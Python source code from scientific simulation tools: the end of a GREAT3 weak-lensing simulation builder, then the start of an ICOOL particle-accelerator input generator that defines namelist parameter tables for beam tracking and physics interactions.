in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
subfield_params = great3sims.mapper.readDict(in_path)
shear_params = {
"g1": subfield_params['shear']['g1'],
"g2": subfield_params['shear']['g2']
}
template = "shear_params-%(subfield_index)03d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(shear_params, outfile)
great3sims.mapper.writeDict(shear_params, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# If this branch has constant shear, then we need the PSF (star) shape parameters.
if self.shear_type == "constant":
# And loop over epochs, copying over the PSF shape parameter files. Can't use
# copyTo() because we want to write as .txt in addition to .yaml
for epoch_index in xrange(self.n_epochs):
tmp_dict["epoch_index"] = epoch_index
template, reader, writer = root_rel_mapper.mappings['starshape_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
starshape_params = great3sims.mapper.readDict(in_path)
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(starshape_params, outfile)
great3sims.mapper.writeDict(starshape_params, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# Close the tarfile. Now that we're done with it, we can go back to our original working
# directory.
tar.close()
os.chdir(saved_path)
# Delete the files / dirs, just keep the tarfiles.
shutil.rmtree(truth_mapper.full_dir)
def generateSubfieldOffsets(self, rng, n_subfields_per_field, subfield_grid_subsampling):
"""A utility to decide about the offsets between subfields in a field.
Currently, the offsets are required to be regular, so that the shear and PSF builders can
simply make an overly dense grid compared to what's needed for a subfield, and use a subset
of its grid points. (This eliminates the need to interpolate the shears, which is useful
since interpolation of shear fields was not tested in GalSim until after the GREAT3 sims
were made.) We assume that the options for offsetting are on an subfield_grid_subsampling x
subfield_grid_subsampling grid. This then gives subfield_grid_subsampling^2 possible
locations. We then choose a random n_subfields_per_field-1 of those options for the
subfields that are not the first in the field.
Offsets between subfields in a field are first specified as integers and are defined as the
offset with respect to the first subfield in the field. Then, we divide by the amount of
grid subsampling for subfields in a field. For example, if subfield_grid_subsampling = 7,
then the minimum and maximum values for x/y offsets are 0/7 and 6/7. Because of our
definition with respect to the first subfield, that subfield must get offset (0, 0).
Results for offsets for each subfield are returned as a list of tuples, where the length of
the list is determined by n_subfields_per_field.
"""
# Check for the simplest case, and do it.
if n_subfields_per_field == 1:
offsets = []
offsets.append((0., 0.))
return offsets
else:
# first do everything in terms of ints, for easier comparison
int_offsets = []
int_offsets.append((0, 0))
for i_subfield in range(n_subfields_per_field-1):
test_tuple = (0, 0)
# Make sure we end up with a unique one that does not exist in int_offsets
while test_tuple in int_offsets:
test_tuple = (numpy.int(numpy.floor(rng()*subfield_grid_subsampling)),
numpy.int(numpy.floor(rng()*subfield_grid_subsampling)))
int_offsets.append(test_tuple)
offsets = [(float(int_offset[0])/subfield_grid_subsampling,
float(int_offset[1])/subfield_grid_subsampling)
for int_offset in int_offsets]
return offsets
|
lsst-dm/great3-public
|
great3sims/builder.py
|
Python
|
bsd-3-clause
| 90,392
|
[
"Galaxy",
"Gaussian"
] |
fa14da325120cdf7f190c605207f816d4e740b1ea1649243406ef82c9a824863
|
# -*- coding: utf-8 -*-
import sys
import icool_exceptions as ie
import copy
"""Nomenclature:
An ICOOL input file consists of:
1. Problem title
2. General control variables
3. Beam generation variables
4. Physics interactions control variables
5. Histogram definition variables
6. Scatterplot definition variables
7. Z-history definition variables
8. R-history definition variables
9. Emittance plane definition variables
10. Covariance plane definition variables
11. Region definition variables.
** Note that region definition variables are referred to in the ICOOL Manual and
herein as commands.
This program will use of following object definitions:
Namelists. Namelists in the for001.dat file are preceded by an '&'
sign (e.g., &cont).
Namelists include:
CONT: Control Variables
BMT: Beam Generation Variables
INTS: Phyiscs Interactions Control Variables
NHS: Histogram Definition Variables
NSC: Scatterplot definition Variables
NZH: Z-History Definition Variables
NRH: R-History Definition Variables
NEM: Emittance Plane Definition Variables
NCV: Covariance Plane Definition Variables
Namelist variables:
Each of the above namelists is associated with a respective set of variables.
Commands:
Commands comprise both Regular Region Commands and Pseudoregion Commands
Regular Region Commands:
SECTION
BEGS
REPEAT
CELL
SREGION
ENDREPEAT
ENDCELL
ENDSECTION
Psuedoregion Commands:
APERTURE
CUTV
DENP
DENS
DISP
DUMMY
DVAR
EDGE
GRID
OUTPUT
RESET
RKICK
ROTATE
TAPER
TILT
TRANSPORT
BACKGROUND
BFIELD
ENDB
!
&
Command parameters:
Each regular and pseduoregion command is respectively associated with a set of command parameters.
"""
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
from IPython.core.magic import (register_line_magic, register_cell_magic,
register_line_cell_magic)
#@register_line_magic
@magic_arguments()
@argument('-o', '--option', help='An optional argument.')
@argument('arg', type=int, help='An integer positional argument.')
def ipycool(self, arg):
""" A really cool ipycool magic command.
"""
args = parse_argstring(ipycool, arg)
@magic_arguments()
@register_line_magic
def icool():
"ICOOL"
exec('!icool')
class ICoolGenerator(object):
def get_base_classes(self):
base_tuple = self.__class__.__bases__
bases_names = tuple()
for c in base_tuple:
bases_names += tuple([c.__name__])
return bases_names
def icoolgenerate_for001(self, file):
base_classes = self.get_base_classes()
if 'ICoolNameList' in base_classes:
ICoolNameList.gen_for001(self, file)
if 'Container' in base_classes:
Container.gen_for001(self, file)
else:
if 'RegularRegion' or 'PseudoRegion' in base_classes:
Region.gen_begtag(self, file)
Region.gen_for001(self, file)
if 'Container' in base_classes:
Container.gen_for001(self, file)
Region.gen_endtag(self, file)
def gen_begtag(self, file):
if hasattr(self, 'begtag'):
file.write(self.begtag)
file.write('\n')
def gen_endtag(self, file):
if hasattr(self, 'endtag'):
file.write(self.endtag)
file.write('\n')
class ICoolObject(object):
"""Generic ICOOL object providing methods for"""
def __init__(self, kwargs):
if self.check_command_params_init(kwargs) is False:
sys.exit(0)
else:
self.setall(kwargs)
def __call__(self, kwargs):
if self.check_command_params_call(kwargs) is False:
sys.exit(0)
else:
self.setall(kwargs)
def __str__(self, return_str):
command_parameters_dict = self.command_params
for key in command_parameters_dict:
if hasattr(self, key):
return_str += '\n'
return_str += key
return_str += ': '
return_str += str(getattr(self, key))
return return_str
def __repr__(self):
return '[ICool Object]'
"""Checks whether all required command parameters specified in __init__ are provided are valid
for the command.
Valid means the parameters are recognized for the command, all required parameters are provided
and the parameters are the correct type."""
def __setattr__(self, name, value):
if self.check_command_param(name):
object.__setattr__(self, name, value)
else:
sys.exit(0)
def check_command_param(self, command_param):
"""
Checks whether a parameter specified for command is valid.
"""
command_parameters_dict = self.get_command_params()
# Check command parameters are all valid
try:
if command_param not in command_parameters_dict:
raise ie.InvalidCommandParameter(
command_param,
command_parameters_dict.keys())
except ie.InvalidCommandParameter as e:
print e
return False
except ie.InvalidType as e:
print e
return False
return True
def check_command_params_valid(
self,
command_params,
command_parameters_dict):
"""Returns True if command_params are valid (correspond to the command)
Otherwise raises an exception and returns False"""
# command_parameters_dict = self.get_command_params()
try:
for key in command_params:
if key not in command_parameters_dict:
raise ie.InvalidCommandParameter(
key,
command_parameters_dict)
except ie.InvalidCommandParameter as e:
print e
return False
return True
def check_all_required_command_params_specified(
self,
command_params,
command_parameters_dict):
"""Returns True if all required command parameters were specified
Otherwise raises an exception and returns False"""
# command_parameters_dict = self.get_command_params()
try:
for key in command_parameters_dict:
if self.is_required(key, command_parameters_dict):
if key not in command_params:
raise ie.MissingCommandParameter(key, command_params)
except ie.MissingCommandParameter as e:
print e
return False
return True
def check_command_params_type(self, command_params, command_params_dict):
"""Checks to see whether all required command parameters specified were of the correct type"""
# command_params_dict = self.get_command_params()
try:
for key in command_params:
if self.check_type(
command_params_dict[key]['type'],
command_params[key]) is False:
raise ie.InvalidType(
command_params_dict[key]['type'],
command_params[key].__class__.__name__)
except ie.InvalidType as e:
print e
return False
return True
def check_command_param_type(self, name, value):
"""Checks to see whether a particular command parameter of name with value is of the correct type"""
command_params_dict = self.get_command_params()
try:
if self.check_type(
command_params_dict[name]['type'],
value) is False:
raise ie.InvalidType(
command_params_dict[name]['type'],
value.__class__.__name__)
except ie.InvalidType as e:
print e
return False
return True
def check_command_params_init(self, command_params):
"""
Checks whether the parameters specified for command are valid, all required parameters are
specified and all parameters are of correct type. If not, raises an exception.
"""
command_parameters_dict = self.get_command_params()
check_params = not self.check_command_params_valid(
command_params,
command_parameters_dict) or not self.check_all_required_command_params_specified(
command_params,
command_parameters_dict) or not self.check_command_params_type(
command_params,
command_parameters_dict)
if check_params:
return False
else:
return True
def check_command_params_call(self, command_params):
"""
Checks whether the parameters specified for command are valid and all required parameters exist.
"""
command_parameters_dict = self.get_command_params()
return self.check_command_params_valid(command_params, command_parameters_dict) and\
self.check_command_params_type(
command_params,
command_parameters_dict)
def setall(self, command_params):
for key in command_params:
self.__setattr__(key, command_params[key])
def setdefault(self, command_params):
command_params_dict = self.get_command_params()
for key in command_params_dict:
if key not in command_params:
self.__setattr__(key, command_params_dict[key]['default'])
def check_type(self, icool_type, provided_type):
"""Takes provided python object and compares with required icool type name.
Returns True if the types match and False otherwise.
"""
provided_type_name = provided_type.__class__.__name__
print icool_type, provided_type_name
if icool_type == 'Real':
if provided_type_name == 'int' or provided_type_name == 'long' or provided_type_name == 'float':
return True
else:
return False
if icool_type == 'Integer':
if provided_type_name == 'int' or provided_type_name == 'long':
return True
else:
return False
if icool_type == 'Logical':
if provided_type_name == 'bool':
return True
else:
return False
if icool_type == 'Field':
if isinstance(provided_type, Field):
return True
else:
return False
if icool_type == 'Material':
if isinstance(provided_type, Material):
return True
else:
return False
if icool_type == 'SubRegion':
if isinstance(provided_type, SubRegion):
return True
else:
return False
if icool_type == 'Distribution':
if isinstance(provided_type, Distribution):
return True
else:
return False
if icool_type == 'Correlation':
if isinstance(provided_type, Correlation):
return True
else:
return False
def get_command_params(self):
return self.command_params
def is_required(self, command_param, command_parameters_dict):
# command_parameters_dict = self.get_command_params()
if 'req' not in command_parameters_dict[command_param]:
return True
else:
return command_parameters_dict[command_param]['req']
def gen_parm(self):
command_params = self.get_command_params()
#parm = [None] * len(command_params)
parm = [None] * self.num_params
for key in command_params:
pos = int(command_params[key]['pos']) - 1
val = getattr(self, key)
parm[pos] = val
print parm
return parm
def for001_str_gen(self, value):
if value.__class__.__name__ == 'bool':
if value is True:
return '.true.'
else:
return '.false.'
else:
return str(value)
def get_begtag(self):
return self.begtag
def get_endtag(self):
return self.endtag
def get_line_splits(self):
return self.for001_format['line_splits']
class ICoolNameList(ICoolObject):
def gen_for001(self, file):
name = self.__class__.__name__.lower()
file.write('&')
file.write(name)
file.write(' ')
count = 0
items_per_line = 5
for key in self.command_params:
if hasattr(self, key):
file.write(str(key))
file.write('=')
file.write(self.for001_str_gen(getattr(self, key)))
file.write(' ')
count = count + 1
if count % items_per_line == 0:
file.write('\n')
file.write('/')
file.write('\n')
class Container(ICoolObject):
"""Abstract class container for other commands.
"""
def __init__(self, enclosed_commands=None):
if enclosed_commands is None:
print "Setting self.enclosed_commands to []"
self.enclosed_commands = []
else:
if self.check_allowed_enclosed_commands(enclosed_commands):
self.enclosed_commands = enclosed_commands
def __setattr__(self, name, value):
# command_parameters_dict = self.command_params
if name == 'enclosed_commands':
object.__setattr__(self, name, value)
else:
if not self.check_command_param(name):
return False
else:
if not self.check_command_param_type(name, value):
return False
else:
object.__setattr__(self, name, value)
return True
def __str__(self):
ret_str = ''
for command in self.enclosed_commands:
ret_str += str(command)
return ret_str
def add_enclosed_command(self, command):
if self.check_allowed_enclosed_command(command) is False:
sys.exit(0)
else:
self.enclosed_commands.append(command)
def insert_enclosed_command(self, command, insert_point):
if self.check_allowed_command(command) is False:
sys.exit(0)
else:
self.enclosed_commands.insert(insert_point, command)
def remove_enclosed_command(self, delete_point):
del self.enclosed_commands[delete_point]
def check_allowed_enclosed_command(self, command):
try:
if command.__class__.__name__ not in self.allowed_enclosed_commands:
raise ie.ContainerCommandError(
command,
self.allowed_enclosed_commands)
except ie.ContainerCommandError as e:
print e
return False
return True
def check_allowed_enclosed_commands(self, enclosed_commands):
pass
def gen_for001(self, file):
for command in self.enclosed_commands:
print 'Command is: ', command
if hasattr(command, 'gen_for001'):
command.gen_for001(file)
else:
file.write(self.for001_str_gen(command))
class ICoolNameListContainer(ICoolNameList, Container):
def gen_for001(self, file):
ICoolNameList.gen_for001(self, file)
Container.gen_for001(self, file)
class Title(ICoolObject):
command_params = {
'title': {'desc': 'Title of ICOOL simulation',
'doc': '',
'type': 'String',
'req': True,
'default': None}
}
def __init__(self, title):
self.title = title
def __str__(self):
return 'Problem Title: ' + self.title + '\n'
def __repr__(self):
return 'Problem Title: ' + self.title + '\n'
def gen_for001(self, file):
file.write(self.title)
file.write('\n')
class Cont(ICoolNameList):
command_params = {
'betaperp': {
'desc': '(R) beta value to use in calculating amplitude variable A^2', 'doc': '',
'type': 'Real',
'req': False,
'default': None},
'bgen': {
'desc': '(L) if .true.=>generate initial beam particles, otherwise read input from FOR003.DAT (true)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'bunchcut': {
'desc': '(R) maximum time difference allowed between a particle and the reference particle [s] (1E6)',
'doc': '',
'type': 'Real',
'req': False,
'default': 1E6},
'bzfldprd': {
'desc': '(R) Bz for solenoid at location of production plane (0.) This is used for output to '
'file for009.dat and for canonical angular momentum correction.',
'doc': '',
'type': 'Real',
'req': False,
'default': None},
'dectrk': {
'desc': '(L) if .true. => continue tracking daughter particle following decay.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'diagref': {
'desc': '(L) if .true. => continue tracking daughter particle following decay.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'epsf': {
'desc': '(R) desired tolerance on fractional field variation, energy loss, and multiple '
'scattering per step',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.05},
'bzfldprd': {
'desc': '(R) Bz for solenoid at location of production plane (0.) This is used for output to '
'file for009.dat and for canonical angular '
'momentum correction.',
'doc': '',
'type': 'Real',
'req': False,
'default': None},
'dectrk': {
'desc': '(L) if .true. => continue tracking daughter particle following decay',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'diagref': {
'desc': '(L) if .true. => continue tracking daughter particle following decay',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'epsf': {
'desc': '(R) desired tolerance on fractional field variation, energy loss, and multiple '
'scattering per step',
'doc': '',
'type': 'Real',
'req': False,
'default': False},
'epsreq': {
'desc': '(R) required tolerance on error in tracking parameters (1E-3) This parameter is '
'only used if varstep = true',
'doc': '',
'type': 'Real',
'req': False,
'default': None},
'epsstep': {
'desc': '(R) desired tolerance in spatial stepping to reach each destination plane [m]',
'type': 'Real',
'doc': '',
'req': False,
'default': 1E-6},
'ffcr': {
'desc': '(L) if .true. => inserts form feed and carriage returns in the output log file so there '
'are two plots per page starting at the top of a page',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'forcerp': {
'desc': '(L) if .true. => set x, y, Px, and Py for reference particle to 0 for each new REFP '
'command and for each ACCEL region with phasemodel=4.',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'fsav': {
'desc': '(L) if .true. => store particle info at plane IZFILE into file FOR004.DAT. (false). '
'It is possible to get the initial distribution of particles that get a given error flag be '
'setting the plane=IFAIL . It is possible to get the initial distribution of particles that '
'successfully make it to the end of the simulation by setting the plane= -1.',
'doc': '',
'type': 'Logical',
'req': False,
'default': None},
'fsavset': {
'desc': '(L) if .true. => modify data stored using FSAV in FOR004.DAT to have z=0 and '
'times relative to reference particle at plane IZFILE.',
'doc': '',
'type':
'Logical',
'req': False,
'default': False},
'f9dp': {
'desc': '(I) number of digits after the decimal point for floating point variables in FOR009.DAT '
'{4,6,8,10,12,14,16,17} (4) F9DP=17 gives 16 digits after the decimal point and 3 digits in the '
'exponent',
'doc': '',
'type': 'Integer',
'req': False,
'default': None},
'goodtrack': {
'desc': '(L) if .true. and BGEN=.false. => only accepts input data from file FOR003.DAT if '
'IPFLG=0.; if .false. => resets IPFLG of bad input tracks to 0 (this allows processing a '
'file of bad tracks for diagnostic purposes)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'izfile': {
'desc': '(I) z-plane where particle info is desired when using FSAV. Use 1 to store beam at '
'production. Saves initial particle properties for bad tracks if IZFILE=IFAIL #. Saves initial '
'particle properties for tracks that get to the end of the simulation if IZFILE=-1. IZFILE '
'should point to the end of a REGION or to an APERTURE , ROTATE or TRANSPORT pseudoregion '
'command.',
'doc': '',
'type': 'Integer',
'req': False,
'default': None},
'magconf': {
'desc': '(I) if 19 < MAGCONF=mn < 100 => reads in file FOR0mn.DAT, which contains data on '
'solenoidal magnets. Used with SHEET, model 4.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'mapdef': {
'desc': '(I) if 19 < MAPDEF=mn < 100 => reads in file FOR0mn.DAT, which contains data on how '
'to set up field grid. Used with SHEET, model 4.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'neighbor': {
'desc': "(L) if .true. => include fields from previous and following regions when calculating "
"field. This parameter can be used with soft-edge fields when the magnitude of the "
"field doesn't fall to 0 at the region boundary. A maximum of 100 region can be used "
"with this feature.",
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'neutrino': {
'desc': '(I) if 19 < NEUTRINO=mn < 100 => writes out file FOR0mn.DAT, which contains '
'neutrino production data. See section 5.2 for the format.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'nnudk': {
'desc': '(I) # of neutrinos to produce at each muon, pion and kaon decay.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 1},
'npart': {
'desc': '(I) # of particles in simulation. The first 300,000 particles are stored in memory. '
'Larger numbers are allowed in principle since ICOOL writes the excess particle '
'information to disc. However, there can be a large space and speed penalty in doing '
'so.',
'doc': '',
'type': 'Integer',
'req': False,
'default': None},
'nprnt': {
'desc': ' Number of diagnostic events to print out to log file.',
'doc': '',
'type': 'Integer',
'req': False,
'default': -1},
'npskip': {
'desc': 'Number of input particles in external beam file to skip before processing starts',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'nsections': {
'desc': '(I) # of times to repeat basic cooling section (1). This parameter can be used to '
'repeat all the commands between the SECTION and ENDSECTION commands in the problem '
'definition. If a REFP command immediately follows the SECTION command, it is not '
'repeated',
'doc': '',
'type': 'Integer',
'req': False,
'default': 1},
'ntuple': {
'desc': '(L) if .true. => store information about each particle after every region in file '
'FOR009.DAT. This variable is forced to be false if RTUPLE= true.(false)}',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'nuthmin': {
'desc': '(R) Minimum polar angle to write neutrino production data to file. [radians]',
'doc': '',
'type': 'Real',
'req': False,
'default': 0},
'nuthmax': {
'desc': 'Maximum polar angle to write neutrino production data to file. [radians]',
'doc': '',
'type': 'Real',
'req': False,
'default': 3.14},
'output1': {
'desc': 'if .true. => write particle information at production (plane 1) to the '
'postprocessor output file for009.dat.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'phantom': {
'desc': 'if .true. => force particle to keep initial transverse coordinates after every '
'(L) if .true. => force particle to keep initial transverse coordinates after '
'every step. This is useful for making magnetic field maps. (false)',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'phasemodel': {
'desc': 'PHASEMODEL (I) controls how the phase is determined in rf cavities. (1) '
'1: takes phase directly from ACCEL command [degrees] '
'2 - 6: takes phase model from REFP command '
'7: reads phases in from file FOR0mn.DAT, where RFPHASE=mn. See sec. 5.1.},',
'doc': '',
'type': 'Integer',
'req': False,
'default': 1},
'prlevel': {
'desc': 'Controls level of print information to log file (for NPRINT events);higher # '
'gives more print(1)',
'doc': '1: values at end of region '
'2: + values at end of each time step '
'3: + E,B values at each step '
'4: + information in cylindrical coordinates',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 4},
'prnmax': {
'desc': 'Sets maximum number of steps to generate print out inside a region',
'doc': '',
'type': 'Integer',
'req': False,
'default': 300},
'pzmintrk': {
'desc': 'Sets the value of Pz below which tracking stops. [GeV/c]',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.001},
'rfdiag': {
'desc': 'if 19 < RFDIAG=mn < 100 => writes rf diagnostic information at the '
'end of each accelerator region to file FOR0mn.DAT.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0,
'min': 19,
'max': 100},
'rfphase': {
'desc': 'If PHASEMODEL=5 => reads rf phases, frequencies and gradients '
'for the cavities from file FOR0mn.DAT, where RFPHASE=mn '
'and 19 < mn < 100 (0)',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0,
'min': 19,
'max': 100},
'rnseed': {
'desc': 'Random number seed (-1) Set to a negative integer',
'doc': '',
'type': 'Integer',
'req': False,
'default': -1},
'rtuple': {
'desc': 'If .true. => particle information in file FOR009.DAT is generated after '
'every RTUPLEN steps.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'rtuplen': {
'desc': '# of steps to skip between RTUPLE generated outputs',
'doc': '',
'type': 'Integer',
'req': False,
'default': 5},
'run_env': {
'desc': 'If true => run ICOOL in beam envelope mode, i.e. no tracking',
'doc': 'For solenoidal channels only.',
'type': 'Logical',
'req': False,
'default': False},
'scalestep': {
'desc': 'Factor that modifies all step sizes in a problem simultaneously.',
'doc': 'Only works in fixed stepsize mode.',
'type': 'Real',
'req': False,
'default': 1.0},
'spin': {
'desc': 'If .true. => include calculation of polarization',
'doc': '',
'type':
'Logical',
'req': False,
'default': False},
'spinmatter': {
'desc': 'Controls whether muon depolarization effects in matter are simulated',
'doc': '0: no depolarization simulation '
'1: depolarization simulation using Rossmanith model'
'2: depolarization simulation using spin flip probabilities',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 3},
'spintrk': {
'desc': 'Controls whether spin variables are tracked',
'doc': '0: no spin tracking '
'1: track spin in muon rest frame using BMT equations',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 1},
'stepmax': {
'desc': 'maximum step size that can be used for variable stepping [m]',
'doc': '',
'type': 'Real',
'req': False,
'default': 1},
'stepmin': {
'desc': 'minimum step size that can be used for variable stepping [m]',
'doc': '',
'type': 'Real',
'req': False,
'default': 1E-5},
'steprk': {
'desc': 'If .true. => use 4th order Runge-Kutta integrator for tracking. '
'Otherwise it uses the Boris push method in straight regions',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'summary': {
'desc': 'if true => writes region summary table to for007.dat',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'termout': {
'desc': 'If .true. => write output to terminal screen',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'timelim': {
'desc': 'Time limit for simulation [min]',
'doc': '',
'type': 'Real',
'req': False,
'default': 1E9},
'varstep': {
'desc': 'If .true. => use adaptive step size; otherwise use fixed step ZSTEP '
'(until reaching the last step in a region).',
'doc': 'This variable is forced to be false (1) in wedge material '
'regions, (2) when the number of radial regions is greater than 1, and (3) when '
'PHASEMODEL=2.',
'type': 'Logical',
'req': False,
'default': True}}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
def __str__(self):
return ICoolObject.__str__(self, 'CONT')
def __repr__(self):
return '[Control variables: ]'
def gen(self, file):
ICoolObject.gen(self, file)
class Bmt(ICoolNameListContainer):
allowed_enclosed_commands = ['BeamType']
command_params = {
'nbeamtyp': {
'desc': '# of beam types, e.g., particles of different masses.',
'doc': '',
'type': 'Integer',
'req': True,
'default': 1},
'bmalt': {
'desc': 'if true => flip sign of alternate particles when BGEN = true.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False}}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Ints(ICoolNameList):
command_params = {
'ldedx': {
'desc': 'If .true. => simulate mean ionization energy loss dE/dx (true)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lscatter': {
'desc': 'if .true. => simulate multiple scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lstrag': {
'desc': 'If .true. => simulate energy straggling',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldecay': {
'desc': 'If .true. => simulate particle decays',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldray': {
'desc': 'If .true. => simulate discrete energy loss from delta rays',
'doc': 'When LDRAY is true, the program forces the parameters DELEV=2 and STRAGLEV=5.',
'type': 'Logical',
'req': False,
'default': True},
'linteract': {
'desc': 'If .true. => simulate inelastic nuclear interactions of pions, kaons and protons',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lspace': {
'desc': 'If .true. => consider effects of space charge',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lelms': {
'desc': 'If .true. => use ELMS model2 for energy loss and scattering',
'doc': 'When this command is true an external file ELMSCOM.TXT must be provided. '
'This file consists of two lines giving (1) the ELMS run directory including path '
'and (2) the root part of the path name to the ELMS database files. For example, '
'\muon\elmsdb\rundirectory.txt\n'
'\muon\elmsdb\elmsfv3run\n'
'ELMS only works in regions containing hydrogen (the SCATLEV model is used in other '
'regions). '
'For hydrogen regions use a stepsize around 5 mm for maximum accuracy. A stepsize of '
'1 mm gives significantly worse results.',
'type': 'Logical',
'req': False,
'default': False},
'lsamcs': {
'desc': 'If .true. => use SAMCS model3 of correlated straggling and scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'delev': {
'desc': 'Model level for dEdx (2)',
'doc': '1: Bethe-Bloch\n'
'2: Bethe-Bloch with density effect\n'
'3: restricted Bethe-Bloch with density effect\n'
'4: test mode with dE = const * dz, independent of velocity and angle',
'type': 'Integer',
'req': False,
'default': 2,
'min': 1,
'max': 4},
'scatlev': {
'desc': '(I) model level for multiple scattering',
'doc': '1: Gaussian( 0, Rossi-Greisen )\n'
'2: Gaussian( 0, Highland )\n'
'3: Gaussian( 0, Lynch-Dahl )\n'
'4: Bethe version of Moliere distribution (with Rutherford limit)\n'
'5: Rutherford\n'
'6: Fano (with Rutherford limit)\n'
'7: Tollestrup (with Rutherford limit)\n'
'Level 2 contains a logarithm term in computing the Gaussian width, so\n'
'it is not useful for general monte carlo work. It gives an accurate estimate of\n'
'the width of the distribution when the step size is the same as the region size.\n'
'In models 4, 6, and 7 when the effective number of scatters is less than 20 Rutherford\n'
'scattering is used with the actual number of scatters in a given step taken from a\n'
'Poisson distribution.',
'type': 'Integer',
'req': False,
'default': 6,
'min': 1,
'max': 6},
'straglev': {
'desc': '(I) Model level for straggling ',
'doc': '1: Gaussian( Bohr )\n'
'2: Landau distribution\n'
'3: (not used)\n'
'4: Vavilov distribution (with appropriate Landau and Gaussian limits determined '
'by the program)\n'
'5: restricted energy fluctuations from continuous processes with energy below DCUTx.',
'type': 'Integer',
'req': False,
'default': 4,
'min': 1,
'max': 5},
'declev': {
'desc': '(I) model level for particle decays (1)',
'doc': '1: uniform polar decay angle for daughter particle in parent rest frame\n'
'2: 90 degree polar decay angle for daughter particle in parent rest frame\n'
'3: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays.\n'
'4: 90 degree polar decay angle for daughter particle in parent rest frame; '
'no mu->e decays\n'
'5: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays;\n'
'save accumulated fractional decay length in POL(1).',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 5},
'intlev': {
'desc': 'Model level for nuclear interactions (1)',
'doc': '1: stop tracking after an interaction\n'
'2: stop tracking after an interaction, except for protons which generate '
'a pion from the Wang distribution.',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 2},
'spacelev': {
'desc': 'Model level for space charge (3)',
'doc': '1: image charge of moving bunch in cylindrical, metallic can\n'
'2: crude transverse space charge for free space applied to all regions\n'
'3: Gaussian bunch space charge (transverse and longitudinal) for free space '
'applied to all regions\n'
'4: same as model 3 for single bunch in a bunch train. All the particles are '
'superimposed\n'
'on 1 bunch given by parameter FRFBUNSC. Adjust PARBUNSC accordingly.',
'type': 'Integer',
'req': False,
'default': 3,
'min': 1,
'max': 4},
'dcute': {
'desc': 'Kinetic energy of electrons, above which delta rays are discretely '
'simulated [GeV] ',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.003},
'dcutm': {
'desc': 'Kinetic energy of muons and other heavy particles, above which delta '
'rays are discretely simulated [GeV] ',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.003},
'elmscor': {
'desc': 'ELMS correlation ',
'doc': '0: run ELMS without correlations (0)\n'
'1: run ELMS with correlations',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 1},
'facfms': {
'desc': 'Factor to correct the Z(Z+1) term in the characteristic angle squared '
'χC2 in Moliere multiple scattering theory '
'times relative to reference particle at plane IZFILE.',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.0},
'facmms': {
'desc': 'Factor to correct screening angle squared χA2 in Moliere multiple ',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.0},
'fastdecay': {
'desc': 'If true => use unphysical decay constants to make {μ,π,K} decay immediately. ',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'frfbunsc': {
'desc': '(R) RF frequency used for space charge model 4. [MHz] (201.) ',
'doc': '',
'type': 'Real',
'req': False,
'default': 201},
'parbunsc': {
'desc': 'Number of muons per bunch for space charge calculation ',
'doc': '',
'type': 'Real',
'req': False,
'default': 4E12},
'pdelev4': {
'desc': 'Momentum for DELEV=4 calculation',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.200},
'wanga': {
'desc': 'Wang parameter A ',
'doc': 'The Wang distribution is given by '
'd2σ/dp dΩ = A pMAX x (1-x) exp{-BxC – DpT} where x = pL / pMAX',
'type': 'Real',
'req': False,
'default': 90.1},
'wangb': {
'desc': 'Wang parameter B',
'doc': '',
'type': 'Real',
